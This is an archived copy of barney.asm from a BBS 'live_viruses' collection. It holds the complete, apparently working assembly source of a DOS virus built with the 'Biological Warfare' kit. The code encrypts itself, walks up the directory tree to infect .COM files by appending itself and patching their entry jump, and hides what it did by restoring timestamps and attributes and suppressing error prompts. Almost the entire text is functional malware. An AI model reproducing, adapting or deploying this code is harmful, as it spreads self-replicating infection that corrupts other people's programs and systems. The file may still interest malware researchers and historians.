home *** CD-ROM | disk | FTP | other *** search

---

/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / barney.asm

< prev

next >

Wrap

Assembly Source File  |  1994-04-11  |  9KB  |  290 lines

---

1. ; barney : BARNEY (c) by HypoDermic!! Part of the Mayberry Family!!!
2. ; Created with Biological Warfare - Version 0.90ß by MnemoniX
3.  
4. PING            equ     0F92Fh
5. INFECT          equ     1
6.  
7. code            segment
8.                 org     100h
9.                 assume  cs:code,ds:code
10.  
11. start:
12.                 db      0E9h,3,0          ; to virus
13. host:
14.                 db      0CDh,20h,0        ; host program
15. virus_begin:
16.  
17.                 mov     dx,VIRUS_SIZE / 2 + 1
18.                 db      0BBh                    ; decryption module
19. code_offset     dw      offset virus_code
20.  
21. decrypt:
22.                 db      02Eh,081h,37h           ; XOR CS:[BX]
23. cipher          dw      0
24.                 inc     bx
25.                 inc     bx
26.                 dec     dx
27.                 jnz     decrypt
28.  
29.  
30. virus_code:
31.                 call    $ + 3             ; BP is instruction ptr.
32.                 pop     bp
33.                 sub     bp,offset $ - 1
34.  
35.                 push    ds es
36.  
37.                 cli
38.                 mov     ax,PING           ; mild anti-trace code
39.                 push    ax
40.                 pop     ax
41.                 dec     sp
42.                 dec     sp
43.                 pop     bx
44.                 cmp     ax,bx
45.                 je      no_trace
46.                 hlt
47.  
48. no_trace:
49.                 sti
50.                 in      al,21h            ; lock out & reopen keyboard
51.                 xor     al,2
52.                 out     21h,al
53.                 xor     al,2
54.                 out     21h,al
55.  
56.                 lea     dx,[bp + offset new_DTA]
57.                 mov     ah,1Ah
58.                 int     21h
59.  
60.                 mov     byte ptr [bp + infections],0
61.  
62.                 call    traverse
63.  
64.                 pop     es ds
65.                 mov     dx,80h
66.                 mov     ah,1Ah
67.                 int     21h
68.  
69. com_exit:
70.                 lea     si,[bp + host]          ; restore host program
71.                 mov     di,100h
72.                 push    di
73.                 movsw
74.                 movsb
75.  
76.                 call    fix_regs                ; fix up registers
77.                 ret                             ; and leave
78.  
79. fix_regs:
80.                 xor     ax,ax
81.                 cwd
82.                 xor     bx,bx
83.                 mov     si,100h
84.                 xor     di,di
85.                 xor     bp,bp
86.                 ret
87.  
88.  
89. traverse:
90.                 sub     sp,64                   ; allocate stack space
91.                 mov     si,sp
92.                 inc     si
93.                 mov     ah,47h                  ; get current directory
94.                 xor     dl,dl
95.                 int     21h
96.  
97.                 dec     si
98.                 mov     byte ptr ss:[si],'\' ; fix directory
99.  
100. next_dir:
101.                 call    infect_dir
102.  
103.                 cmp     byte ptr [bp + infections],INFECT
104.                 je      traverse_done
105.  
106.                 lea     dx,[bp + outer]         ; repeat in next dir up
107.                 mov     ah,3Bh
108.                 int     21h
109.                 jnc     next_dir
110.  
111. traverse_done:
112.                 add     sp,64                   ; reset
113.                 mov     dx,si
114.                 mov     ah,3Bh
115.                 int     21h
116.                 ret
117.  
118. infect_dir:
119.                 mov     ah,4Eh
120.                 lea     dx,[bp + find_me]
121.                 int     21h
122.                 jc      infect_done
123.  
124. next_file:
125.                 lea     dx,[bp + new_DTA + 1Eh]
126.                 call    execute
127.                 cmp     byte ptr [bp + infections],INFECT
128.                 je      infect_done
129.                 mov     ah,4Fh
130.                 int     21h
131.                 jnc     next_file
132.  
133. infect_done:
134.                 ret
135. execute:
136.                 push    si
137.  
138.                 xor     ax,ax                   ; critical error handler
139.                 mov     es,ax                   ; routine - catch int 24
140.                 lea     ax,[bp + int_24]
141.                 mov     es:[24h * 4],ax
142.                 mov     es:[24h * 4 + 2],cs
143.  
144.                 mov     ax,4300h                ; change attributes
145.                 int     21h
146.  
147.                 push    cx dx ds
148.                 xor     cx,cx
149.                 call    set_attributes
150.  
151.                 mov     ax,3D02h                ; open file
152.                 int     21h
153.                 jc      cant_open
154.                 xchg    bx,ax
155.  
156.                 mov     ax,5700h                ; save file date/time
157.                 int     21h
158.                 push    cx dx
159.                 mov     ah,3Fh
160.                 mov     cx,28
161.                 lea     dx,[bp + read_buffer]
162.                 int     21h
163.  
164.                 cmp     word ptr [bp + read_buffer],'ZM'
165.                 je      dont_infect             ; .EXE, skip
166.  
167.                 mov     al,2                    ; move to end of file
168.                 call    move_file_ptr
169.  
170.                 cmp     dx,65279 - (VIRUS_SIZE + 3)
171.                 ja      dont_infect             ; too big, don't infect
172.  
173.                 sub     dx,VIRUS_SIZE + 3       ; check for previous infection
174.                 cmp     dx,word ptr [bp + read_buffer + 1]
175.                 je      dont_infect
176.  
177.                 add     dx,VIRUS_SIZE + 3
178.                 mov     word ptr [bp + new_jump + 1],dx
179.  
180.                 add     dx,103h
181.                 call    encrypt_code            ; encrypt virus
182.  
183.                 lea     dx,[bp + read_buffer]   ; save original program head
184.                 int     21h
185.                 mov     ah,40h                  ; write virus to file
186.                 mov     cx,VIRUS_SIZE
187.                 lea     dx,[bp + encrypt_buffer]
188.                 int     21h
189.  
190.                 xor     al,al                   ; back to beginning of file
191.                 call    move_file_ptr
192.  
193.                 lea     dx,[bp + new_jump]
194.                 int     21h
195.  
196. fix_date_time:
197.                 pop     dx cx
198.                 mov     ax,5701h                ; restore file date/time
199.                 int     21h
200.  
201.                 inc     byte ptr [bp + infections]
202.  
203. close:
204.                 pop     ds dx cx                ; restore attributes
205.                 call    set_attributes
206.  
207.                 mov     ah,3Eh                  ; close file
208.                 int     21h
209.  
210. cant_open:
211.                 pop     si
212.                 ret
213.  
214.  
215. set_attributes:
216.                 mov     ax,4301h
217.                 int     21h
218.                 ret
219.  
220. dont_infect:
221.                 pop     cx dx                   ; can't infect, skip
222.                 jmp     close
223.  
224. move_file_ptr:
225.                 mov     ah,42h                  ; move file pointer
226.                 cwd
227.                 xor     cx,cx
228.                 int     21h
229.  
230.                 mov     dx,ax                   ; set up registers
231.                 mov     ah,40h
232.                 mov     cx,3
233.                 ret
234.  
235. courtesy_of     db      '[BW]',0
236. signature       db      'BARNEY (c) by HypoDermic!! Part of the Mayberry Family!!!',0
237.  
238.  
239. encrypt_code:
240.                 push    ax cx
241.  
242.                 push    dx
243.                 xor     ah,ah                   ; get time for random number
244.                 int     1Ah
245.  
246.                 mov    [bp + cipher],dx
247.                 pop     cx
248.                 add     cx,virus_code - virus_begin
249.                 mov     [bp + code_offset],cx
250.                 push    cs                      ; ES = CS
251.                 pop     es
252.  
253.                 lea     si,[bp + virus_begin]
254.                 lea     di,[bp + offset encrypt_buffer]
255.                 mov     cx,virus_code - virus_begin
256.                 rep     movsb
257.  
258.                 mov     cx,VIRUS_SIZE / 2 + 1
259. encrypt:
260.                 lodsw                           ; encrypt virus code
261.                 xor     ax,dx
262.                 stosw
263.                 loop    encrypt
264.  
265.                 pop     cx ax
266.                 ret
267.  
268.  
269. find_me         db      '*.COM',0
270. outer           db      '..',0
271.  
272. int_24:
273.                 mov     al,3                    ; int 24 handler
274.                 iret
275. new_jump        db      0E9h,0,0
276.  
277. infections      db      0
278. virus_end:
279. VIRUS_SIZE      equ     virus_end - virus_begin
280. read_buffer     db      28 dup (?)              ; read buffer
281. new_DTA         db      128 dup(?)
282. encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer
283.  
284. end_heap:
285.  
286. MEM_SIZE        equ     end_heap - start
287.  
288. code            ends
289.                 end     start
290.